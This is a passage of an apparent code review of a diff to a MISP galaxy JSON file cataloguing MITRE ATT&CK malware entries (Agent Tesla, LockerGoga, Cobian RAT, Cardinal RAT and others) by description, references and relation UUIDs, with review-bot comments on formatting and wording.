"7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "198db886-47af-4f4c-bff5-11b891f85946", + "value": "Zeus Panda - S0330" + }, { "description": "[SpyNote RAT](https://attack.mitre.org/software/S0305) (Remote Access Trojan) is a family of malicious Android apps. The [SpyNote RAT](https://attack.mitre.org/software/S0305) builder tool can be used to develop malicious apps with the malware's functionality. (Citation: Zscaler-SpyNote)", "meta": { @@ -636,14 +973,21 @@ "type": "uses" }, { - "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4", + "dest-uuid": "bd4d32f5-eed4-4018-a649-40b229dd1d69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -662,13 +1006,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "bd4d32f5-eed4-4018-a649-40b229dd1d69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "20dbaf05-59b8-4dc6-8777-0b17f4553a23", 
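Review bot: The Zeus Panda ref `https://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html#More` carries a page fragment (`#More`) that is not part of the resource identity; it should be normalised to `https://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html` so the reference de-duplicates against the same URL cited elsewhere and stays valid if the blog's anchor names change. The description also says the sample's "original source code was leaked in 2011", which reads as if Zeus Panda itself leaked; if the cited Talos/GDATA sources mean the Zeus codebase that Panda was derived from, wording such as "is based on the Zeus source code leaked in 2011" would be clearer, but that should be checked against those sources before diverging from the upstream MITRE text. The two short hunks that follow on this line only reorder SpyNote RAT relations.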
@@ -704,13 +1041,6 @@ ], "type": "uses" }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", "tags": [ @@ -725,6 +1055,13 @@ ], "type": "uses" }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "6aabc5ec-eae6-422c-8311-38d45ee9838a", "tags": [ @@ -773,13 +1110,6 @@ ], "type": "uses" }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ @@ -795,7 +1125,7 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -807,6 +1137,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "8e461ca3-0996-4e6e-a0df-e2a5bbc51ebc", @@ -899,14 +1236,14 @@ "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -916,6 +1253,161 @@ "uuid": "f5352566-1a64-49ac-8f7f-97e1d1a03300", "value": "AutoIt backdoor - S0129" }, + { + "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) is a spyware Trojan written in visual basic.(Citation: Fortinet Agent Tesla April 2018)", + "meta": { + "external_id": "S0331", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0331", + "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html", + "https://blog.talosintelligence.com/2018/10/old-dog-new-tricks-analysing-new-rtf_15.html", + "https://www.digitrustgroup.com/agent-tesla-keylogger/" + ], + "synonyms": [ + "Agent Tesla" + ] + }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "e7a5229f-05eb-440e-b982-9a6d2b2b87c8", + "value": "Agent Tesla - S0331" + }, { 
"description": "[Power Loader](https://attack.mitre.org/software/S0177) is modular code sold in the cybercrime market used as a downloader in malware families such as Carberp, Redyms and Gapz. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)", "meta": { @@ -962,7 +1454,7 @@ }, "related": [ { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -976,21 +1468,7 @@ "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1004,7 +1482,21 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1054,7 +1546,7 @@ "type": "uses" }, { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -1067,6 +1559,13 @@ ], "type": "uses" }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ @@ -1074,6 +1573,41 @@ ], "type": "uses" }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ 
@@ -1088,59 +1622,128 @@ ], "type": "uses" }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "0c824410-58ff-49b2-9cf2-1c96b182bdf0", "value": "Smoke Loader - S0226" }, + { + "description": "[Linux Rabbit](https://attack.mitre.org/software/S0362) is malware that targeted Linux servers and IoT devices in a campaign lasting from August to October 2018. It shares code with another strain of malware known as Rabbot. 
The goal of the campaign was to install cryptocurrency miners onto the targeted servers and devices.(Citation: Anomali Linux Rabbit 2018)\n", + "meta": { + "external_id": "S0362", + "mitre_platforms": [ + "Linux" + ], + "refs": [ + "https://attack.mitre.org/software/S0362", + "https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat" + ], + "synonyms": [ + "Linux Rabbit" + ] + }, + "related": [ + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01df3350-ce05-4bdf-bdf8-0a919a66d4a8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "0efefea5-78da-4022-92bc-d726139e8883", + "value": "Linux Rabbit - S0362" + }, + { + "description": "[LockerGoga ](https://attack.mitre.org/software/S0372) is ransomware that has been tied to various attacks on European companies. 
It was first reported upon in January 2019.(Citation: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga 2019)", + "meta": { + "external_id": "S0372", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0372", + "https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/", + "https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/" + ], + "synonyms": [ + "LockerGoga " + ] + }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "5af7a825-2d9f-400d-931a-e00eb9e27f48", + "value": "LockerGoga - S0372" + }, { "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) is Android malware that has reportedly been used to successfully compromise the mobile devices of government officials, members of the military, medical professionals, and civilians. The iOS malware known as [Tangelo](https://attack.mitre.org/software/S0329) is believed to be from the same developer. (Citation: Lookout-StealthMango)", "meta": { 
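Review bot: The new LockerGoga entry carries a trailing space inside its identifiers: the synonym is `"LockerGoga "` and the description link text is `[LockerGoga ](https://attack.mitre.org/software/S0372)`, while `value` is `"LockerGoga - S0372"` without one. MISP resolves clusters and searches by exact string comparison on `value`/`synonyms`, so a lookup for `LockerGoga` will not match this cluster through the synonym; it should be `"LockerGoga"` and the link text trimmed. The Linux Rabbit description in the same hunk ends with a literal `\n` inside the string (`…(Citation: Anomali Linux Rabbit 2018)\n`), which renders as a stray blank line; both look like upstream MITRE whitespace that the generator should strip on import. The Smoke Loader relation changes at the top of the hunk are reorder-only.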
@@ -1158,14 +1761,21 @@ }, "related": [ { - "dest-uuid": "62adb627-f647-498e-b4cc-41499361bacb", + "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "dest-uuid": "4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1185,27 +1795,6 @@ ], "type": "uses" }, - { - "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0d95940f-9583-4e0f-824c-a42c1be47fad", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "fd339382-bfec-4bf0-8d47-1caedc9e7e57", "tags": [ @@ -1213,6 +1802,27 @@ ], "type": "uses" }, + { + "dest-uuid": "62adb627-f647-498e-b4cc-41499361bacb", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3c2e5de-0941-4b57-ba61-af029eb5517a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "198ce408-1470-45ee-b47f-7056050d4fc2", "tags": [ 
@@ -1220,13 +1830,6 @@ ], "type": "uses" }, - { - "dest-uuid": "4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd", "tags": [ @@ -1235,7 +1838,7 @@ "type": "uses" }, { - "dest-uuid": "b3c2e5de-0941-4b57-ba61-af029eb5517a", + "dest-uuid": "0d95940f-9583-4e0f-824c-a42c1be47fad", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1261,6 +1864,41 @@ ] }, "related": [ + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", "tags": [ 
@@ -1268,6 +1906,34 @@ ], "type": "uses" }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ 
@@ -1275,6 +1941,151 @@ ], "type": "uses" }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "b9799466-9dd7-4098-b2d6-f999ce50b9a8", + "value": "Gold Dragon - S0249" + }, + { + "description": "[Cobian RAT](https://attack.mitre.org/software/S0338) is a backdoor, remote access tool that has been observed since 2016.(Citation: Zscaler Cobian Aug 2017)", + "meta": { + "external_id": "S0338", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0338", + "https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat" + ], + "synonyms": [ + "Cobian RAT" + ] + }, + "related": [ + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "aa1462a1-d065-416c-b354-bedd04998c7f", + "value": "Cobian RAT - S0338" + }, + { + "description": "[Cardinal RAT](https://attack.mitre.org/software/S0348) is a potentially low volume remote access trojan (RAT) observed since December 2015. [Cardinal RAT](https://attack.mitre.org/software/S0348) is notable for its unique utilization of uncompiled C# source code and the Microsoft Windows built-in csc.exe compiler.(Citation: PaloAlto CardinalRat Apr 2017)", + "meta": { + "external_id": "S0348", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0348", + "https://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/" + ], + "synonyms": [ + "Cardinal RAT" + ] + }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ 
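Review bot: The Cobian RAT description ("a backdoor, remote access tool that has been observed since 2016") omits the one caveat a handler of this family most needs, and the only cited source's URL slug, `cobian-rat-backdoored-rat`, suggests the research's key finding is that the RAT or its builder is itself backdoored by its author. If the Zscaler write-up confirms that, a sentence such as "The freely distributed builder reportedly contains a hidden backdoor giving the original author access to victims of operators using it." belongs in the description, since it changes how samples and their C2 should be attributed. This should be checked against the source rather than asserted from the slug. The Gold Dragon entry closed at the top of this hunk is the re-emitted copy of a cluster whose old position is rewritten later in the patch.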
@@ -1282,6 +2093,62 @@ ], "type": "uses" }, + { + "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ 
@@ -1297,19 +2164,81 @@ "type": "uses" }, { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cf7b3a06-8b42-4c33-bbe9-012120027925", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "b879758f-bbc4-4cab-b5ba-177ac9b009b4", + "value": "Cardinal RAT - S0348" + }, + { + "description": "[Olympic Destroyer](https://attack.mitre.org/software/S0365) is malware that was first seen infecting computer systems at the 2018 Winter Olympics, held in Pyeongchang, South Korea. The main purpose of the malware appears to be to cause destructive impact to the affected systems. The malware leverages various native Windows utilities and API calls to carry out its destructive tasks. 
